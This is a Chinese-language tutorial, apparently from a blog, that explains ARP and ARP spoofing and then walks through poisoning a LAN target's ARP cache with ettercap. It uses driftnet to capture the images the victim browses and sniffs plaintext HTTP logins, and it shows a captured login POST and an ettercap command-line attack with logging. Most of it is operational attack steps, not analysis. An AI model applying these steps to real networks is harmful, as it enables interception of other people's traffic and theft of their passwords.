arp嗅探——ettercap+driftnet

時間  2020-02-05 標籤 arp 嗅探 ettercap+driftnet ettercap driftnet

ARP:php

地址解析協議,根據IP地址查詢MAC物理地址,以便進行物理網絡通訊。ajax

 

ARP原理:緩存

A電腦192.168.1.2想與B電腦192.168.1.3通訊,網絡通訊必需知道對方的MAC物理地址才能夠傳輸數據,因此A電腦在網絡上廣播說:IP地址是192.168.1.3是誰,把你的MAC物理地址告訴我。不是B的電腦收到廣播後發現跟本身無關,就不回話,只有B電腦進行回話告訴A本身的MAC物理地址。網絡

 

ARP欺騙原理:app

C電腦192.168.1.7,MAC地址爲xx.xx在網絡上廣播撒謊說:個人IP是192.168.1.1,個人MAC物理地址是xx.xx,收到消息的電腦都記住了這種假信息(存留在ARP緩存表裏),今後之後發送給192.168.1.1的數據都會發給MAC地址xx.xx(192.168.1.7)C電腦了。url

 

攻擊原理:通常家庭裏電腦上網都會將數據發送給網關(路由器),若是讓目標靶機電腦上的ARP緩存錯誤的存爲攻擊機的信息,攻擊機就能夠假裝成網關,這樣目標靶機全部數據都會發給攻擊機,實現劫持。命令行

 

網關:192.168.1.1 (路由器)excel

靶機:192.168.1.8 (Windows XP)code

攻擊機:192.168.1.7(Linux)orm

 

查看靶機ARP緩存信息:

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.1.8 --- 0x2

Internet Address Physical Address Type

192.168.1.1 ec-xx-xx-xx-xx-3f dynamic

 

開機攻擊:

  1. 在攻擊機上打開ettercap,點擊Sniff->Unified sniffing->eth0
  2. Hosts->Scan for hosts
  3. Hosts->Host list
  4. 選擇192.168.1.8靶機IP,點擊Add to Target1,選擇192.168.1.1網關點擊Add to Target2
  5. Mitm->ARP poisoning->勾選Sniff remote connections,此時就已經對靶機進行了欺騙,到靶機上查看ARP緩存,發現192.168.1.1網關IP的MAC地址變成了攻擊的MAC地址,這樣發給網關的數據就會發送給攻擊機了。

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.1.8 --- 0x2

Internet Address Physical Address Type

192.168.1.1 08-xx-xx-xx-xx-5e dynamic

192.168.1.7 08-xx-xx-xx-xx-5e dynamic

 

到查看靶機的圖片

  1. 在攻擊機上打開driftnet,執行命令driftnet -i eth0
  2. 此時,靶機瀏覽圖片,在攻擊機上能夠查看到圖片內容。
  3. 使用driftnet -i eth0 -d /root/Pictures -a能夠將圖片保存到指定目標
  4. 關掉ettercap中止嗅探,再查看靶機ARP緩存會發現又變回原來的信息了

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.1.8 --- 0x2

Internet Address Physical Address Type

192.168.1.1 ec-xx-xx-xx-xx-3f dynamic

 

嗅探靶機http網絡帳號密碼:

  1. 在攻擊機上打開ettercap,點擊Sniff->Unified sniffing->eth0
  2. Hosts->Scan for hosts
  3. Hosts->Host list
  4. 選擇192.168.1.8靶機IP,點擊Add to Target1,選擇192.168.1.1網關點擊Add to Target2
  5. Mitm->ARP poisoning->勾選Sniff remote connections
  6. Start->Start sniffing
  7. View->Connections能夠查年到監聽到的信息,雙擊信息可查看詳細內容,如下監聽到的網絡帳號aaaaaaa密碼bbbbbbb

POST /login.php?nowtime=1545925967777&verify=fba67eef HTTP/1.1.

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*.

Referer: http://www.xxx.com/thread.php?fid=38.

Accept-Language: zh-cn.

Content-Type: application/x-www-form-urlencoded.

UA-CPU: x86.

Accept-Encoding: gzip, deflate.

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2).

Host: www.xxx.com.

Content-Length: 109.

Connection: Keep-Alive.

Cache-Control: no-cache.

Cookie: dd452_lastvisit=1769%091545925789%09%2Flogin.php%3Fnowtime1545925789701%26verifyfba67eef; dd452_lastpos=other; dd452_ol_offset=11543; dd452_ipstate=1545924020; _ac_app_ua=8a8f4074b5cc6c0ef5; dd452_cloudClientUid=5450535; dd452_threadlog=%2C38%2C..

jumpurl=http%3A%2F%2Fwww.xxx.com%2Fthread.php%3Ffid%3D38&step=2&ajax=1&pwuser=aaaaaaa&pwpwd=bbbbbbb&lgt=0

 

 

使用命令行:

攻擊命令:

sudo ettercap -Tqi en0 -M arp:remote /192.168.1.4// /192.168.1.1// -l /tmp/log

會在/tmp下生成log.eci與log.ecp的文件,直接用etterlog就能夠查看

etterlog log.ecp

联系我们 沪ICP备13005482号-10